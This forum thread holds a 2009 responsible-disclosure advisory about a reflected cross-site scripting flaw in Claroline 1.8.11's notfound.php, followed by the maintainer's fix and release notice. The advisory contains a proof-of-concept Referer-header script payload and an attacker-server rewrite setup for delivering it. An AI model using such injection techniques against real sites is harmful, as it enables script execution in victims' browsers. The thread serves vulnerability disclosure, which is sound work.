Claroline 1.8.11 Cross-Site Scripting

Tell us what's wrong.

Claroline 1.8.11 Cross-Site Scripting

Postby sanyi » Tue May 05, 2009 12:43 pm

Author: Gerendi Sandor Attila ( http://gsasec.blogspot.com/ )
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (older versions are also affected)
Severity: Medium

Input passed to the 'Referer' header parameter when posting to '/claroline/linker/notfound.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Example:

GET /claroline_1_8_11/claroline/linker/notfound.php HTTP/1.0
Accept: */*
Referer: "><script>alert(123)</script><a href="

There are a couple of ways to inject arbitrary text (java script in our case) in the referer header parameter. One of the ways is using a rewrite rule on the remote attacker server. Example .htaccess file:

Code: Select all
RewriteEngine  on
RewriteRule ^referer/.*$ test.php [L]


Where the test.php file will be the container of the /claroline_1_8_11/claroline/linker/notfound.php link.

Now a request like:
Code: Select all
http://remoteatackersite/referer/?"><script>alert(123)</script><a%20href="


will return a page from wich if we call /claroline_1_8_11/claroline/linker/notfound.php we trigger the XSS.

Note: For the first request browsers like IE are required (which does not automatically httpencode the get params)

Status:
1. Contacted the author at: May 05, 2009 via http://forum.claroline.net./

Note:
-the original advisory place is at http://gsasec.blogspot.com/ , but it will be published only after the vulnerability reception, validation and correction. Also at that time it will reported to Secunia and SecurityFocus.
sanyi
 
Posts: 3
Joined: Tue May 05, 2009 12:32 pm

Re: Claroline 1.8.11 Cross-Site Scripting

Postby zefredz » Tue May 05, 2009 2:00 pm

Hello,

Thanks for this vulnerability report. The file has been fixed.

A new release of Claroline 1.8 will be released in the next few weeks immediatly after the release of Claroline 1.9.0 final.

Until this new release is available, the platform administrators who run Claroline 1.8.11 are strongly recommanded to replace the old file claroline/linker/notfound.php by the new one available here : http://claroline.svn.sourceforge.net/vi ... tfound.php

Note that the linker tool has been completely rewritten for Claroline 1.9 and this file does not exists anymore in the platform.

Best Regards,
Frederic Minne (ZeFredz) - Université catholique de Louvain - Contributor to Claroline
Image
User avatar
zefredz
Contributeurs Actif Forum
 
Posts: 1455
Joined: Thu Sep 02, 2004 1:41 pm
Location: Belgium, Louvain-la-Neuve

Re: Claroline 1.8.11 Cross-Site Scripting

Postby sanyi » Tue May 05, 2009 2:50 pm

Thank you for the extremely rapid reply and fix.
sanyi
 
Posts: 3
Joined: Tue May 05, 2009 12:32 pm

Re: Claroline 1.8.11 Cross-Site Scripting

Postby zefredz » Tue Jun 02, 2009 8:06 am

Hello,

Claroline 1.8.12 has been released and contains the fixed scripts for this vulnerability.

Thanks again for reporting the issue.

Best Regards,
Frederic Minne (ZeFredz) - Université catholique de Louvain - Contributor to Claroline
Image
User avatar
zefredz
Contributeurs Actif Forum
 
Posts: 1455
Joined: Thu Sep 02, 2004 1:41 pm
Location: Belgium, Louvain-la-Neuve


Return to Bugs Claroline 1.8.11

Who is online

Users browsing this forum: No registered users and 1 guest

cron